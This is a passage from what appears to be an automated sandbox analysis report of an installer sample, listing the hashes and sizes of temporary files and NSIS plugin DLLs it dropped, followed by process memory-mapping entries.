                                                                          SHA1

                                                                          bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                          SHA256

                                                                          2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                          SHA512

                                                                          e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                        • \Users\Admin\AppData\Local\Temp\is-VII6K.tmp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.tmp
                                                                          Filesize

                                                                          2.5MB

                                                                          MD5

                                                                          d0e24e6d7017127bea02bb0160229bee

                                                                          SHA1

                                                                          34350e5b7f268797b2a7ec56390c2228f841b37b

                                                                          SHA256

                                                                          ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994

                                                                          SHA512

                                                                          f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\Aero.dll
                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          869c5949a10b32d3a31966cc5291301b

                                                                          SHA1

                                                                          329080c974d593ecdefd02afa38dd663a10331c4

                                                                          SHA256

                                                                          b19961de6ca07e08704d6372718542f70dbbb203e59bf9bbe3a58f6e069a625c

                                                                          SHA512

                                                                          3b9dde16e9ca803b1048243dbf29c717ac0472dffa764542c234318a960828834aa650b1dfb8bba66c4e7a9ce3aaf453829afc57dfb33dc8c311d203150d4fca

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\LangDLL.dll
                                                                          Filesize

                                                                          5KB

                                                                          MD5

                                                                          109b201717ab5ef9b5628a9f3efef36f

                                                                          SHA1

                                                                          98db1f0cc5f110438a02015b722778af84d50ea7

                                                                          SHA256

                                                                          20e642707ef82852bcf153254cb94b629b93ee89a8e8a03f838eef6cbb493319

                                                                          SHA512

                                                                          174e241863294c12d0705c9d2de92f177eb8f3d91125b183d8d4899c89b9a202a4c7a81e0a541029a4e52513eee98029196a4c3b8663b479e69116347e5de5b4

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\System.dll
                                                                          Filesize

                                                                          12KB

                                                                          MD5

                                                                          8cf2ac271d7679b1d68eefc1ae0c5618

                                                                          SHA1

                                                                          7cc1caaa747ee16dc894a600a4256f64fa65a9b8

                                                                          SHA256

                                                                          6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba

                                                                          SHA512

                                                                          ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\newadvsplash.dll
                                                                          Filesize

                                                                          8KB

                                                                          MD5

                                                                          55a723e125afbc9b3a41d46f41749068

                                                                          SHA1

                                                                          01618b26fec6b8c6bdb866e6e4d0f7a0529fe97c

                                                                          SHA256

                                                                          0a70cc4b93d87ecd93e538cfbed7c9a4b8b5c6f1042c6069757bda0d1279ed06

                                                                          SHA512

                                                                          559157fa1b3eb6ae1f9c0f2c71ccc692a0a0affb1d6498a8b8db1436d236fd91891897ac620ed5a588beba2efa43ef064211a7fcadb5c3a3c5e2be1d23ef9d4c

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\nsDialogs.dll
                                                                          Filesize

                                                                          9KB

                                                                          MD5

                                                                          ec9640b70e07141febbe2cd4cc42510f

                                                                          SHA1

                                                                          64a5e4b90e5fe62aa40e7ac9e16342ed066f0306

                                                                          SHA256

                                                                          c5ba017732597a82f695b084d1aa7fe3b356168cc66105b9392a9c5b06be5188

                                                                          SHA512

                                                                          47605b217313c7fe6ce3e9a65da156a2fba8d91e4ed23731d3c5e432dd048ff5c8f9ae8bb85a6a39e1eac4e1b6a22862aa72d3b1b1c8255858997cdd4db5d1fe

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\nsExec.dll
                                                                          Filesize

                                                                          7KB

                                                                          MD5

                                                                          f27689c513e7d12c7c974d5f8ef710d6

                                                                          SHA1

                                                                          e305f2a2898d765a64c82c449dfb528665b4a892

                                                                          SHA256

                                                                          1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47

                                                                          SHA512

                                                                          734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

                                                                        • \Users\Admin\AppData\Local\Temp\nso95EC.tmp\nsExec.dll
                                                                          Filesize

                                                                          7KB

                                                                          MD5

                                                                          f27689c513e7d12c7c974d5f8ef710d6

                                                                          SHA1

                                                                          e305f2a2898d765a64c82c449dfb528665b4a892

                                                                          SHA256

                                                                          1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47

                                                                          SHA512

                                                                          734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

                                                                        • memory/520-75-0x0000000000000000-mapping.dmp
                                                                        • memory/532-128-0x0000000000000000-mapping.dmp
                                                                        • memory/580-73-0x0000000000000000-mapping.dmp
                                                                        • memory/584-99-0x0000000000000000-mapping.dmp
                                                                        • memory/604-90-0x0000000000000000-mapping.dmp
                                                                        • memory/648-97-0x0000000000000000-mapping.dmp
                                                                        • memory/864-80-0x0000000000000000-mapping.dmp
                                                                        • memory/876-93-0x0000000000000000-mapping.dmp
                                                                        • memory/884-106-0x0000000000000000-mapping.dmp
                                                                        • memory/936-98-0x0000000000000000-mapping.dmp
                                                                        • memory/988-103-0x0000000000000000-mapping.dmp
                                                                        • memory/1072-111-0x0000000000000000-mapping.dmp
                                                                        • memory/1120-124-0x0000000000000000-mapping.dmp
                                                                        • memory/1192-77-0x0000000000000000-mapping.dmp
                                                                        • memory/1316-84-0x0000000000000000-mapping.dmp
                                                                        • memory/1328-88-0x0000000000000000-mapping.dmp
                                                                        • memory/1336-91-0x0000000000000000-mapping.dmp
                                                                        • memory/1420-94-0x0000000000000000-mapping.dmp
                                                                        • memory/1456-114-0x0000000000000000-mapping.dmp
                                                                        • memory/1484-63-0x0000000074521000-0x0000000074523000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/1484-58-0x0000000000000000-mapping.dmp
                                                                        • memory/1536-100-0x0000000000000000-mapping.dmp
                                                                        • memory/1548-83-0x0000000000000000-mapping.dmp
                                                                        • memory/1552-79-0x0000000000000000-mapping.dmp
                                                                        • memory/1552-130-0x0000000000000000-mapping.dmp
                                                                        • memory/1576-109-0x0000000000000000-mapping.dmp
                                                                        • memory/1608-107-0x0000000000000000-mapping.dmp
                                                                        • memory/1620-92-0x0000000000000000-mapping.dmp
                                                                        • memory/1648-101-0x0000000000000000-mapping.dmp
                                                                        • memory/1652-151-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-161-0x000000000043FAB5-mapping.dmp
                                                                        • memory/1652-152-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-154-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-156-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-158-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-170-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-163-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1652-166-0x0000000000090000-0x0000000000122000-memory.dmp
                                                                          Filesize

                                                                          584KB

                                                                        • memory/1704-78-0x0000000000000000-mapping.dmp
                                                                        • memory/1708-76-0x0000000000000000-mapping.dmp
                                                                        • memory/1716-104-0x0000000000000000-mapping.dmp
                                                                        • memory/1740-118-0x0000000000000000-mapping.dmp
                                                                        • memory/1748-123-0x0000000000000000-mapping.dmp
                                                                        • memory/1752-64-0x0000000000000000-mapping.dmp
                                                                        • memory/1780-66-0x0000000000000000-mapping.dmp
                                                                        • memory/1804-105-0x0000000000000000-mapping.dmp
                                                                        • memory/1824-102-0x0000000000000000-mapping.dmp
                                                                        • memory/1832-95-0x0000000000000000-mapping.dmp
                                                                        • memory/1840-96-0x0000000000000000-mapping.dmp
                                                                        • memory/1916-140-0x0000000000000000-mapping.dmp
                                                                        • memory/1916-87-0x0000000000000000-mapping.dmp
                                                                        • memory/1952-85-0x0000000000000000-mapping.dmp
                                                                        • memory/2008-89-0x0000000000000000-mapping.dmp
                                                                        • memory/2020-61-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                          Filesize

                                                                          824KB

                                                                        • memory/2020-54-0x0000000074DD1000-0x0000000074DD3000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/2020-55-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                          Filesize

                                                                          824KB

                                                                        • memory/2032-86-0x0000000000000000-mapping.dmp
                                                                        • memory/2036-149-0x00000000003C0000-0x00000000003D2000-memory.dmp
                                                                          Filesize

                                                                          72KB

                                                                        • memory/2036-144-0x0000000000390000-0x00000000003B4000-memory.dmp
                                                                          Filesize

                                                                          144KB

                                                                        • memory/2036-143-0x0000000000320000-0x0000000000340000-memory.dmp
                                                                          Filesize

                                                                          128KB

                                                                        • memory/2036-82-0x0000000000000000-mapping.dmp
                                                                        • memory/2036-138-0x0000000000130000-0x000000000026A000-memory.dmp
                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2036-136-0x0000000000000000-mapping.dmp
                                                                        • memory/2040-81-0x0000000000000000-mapping.dmp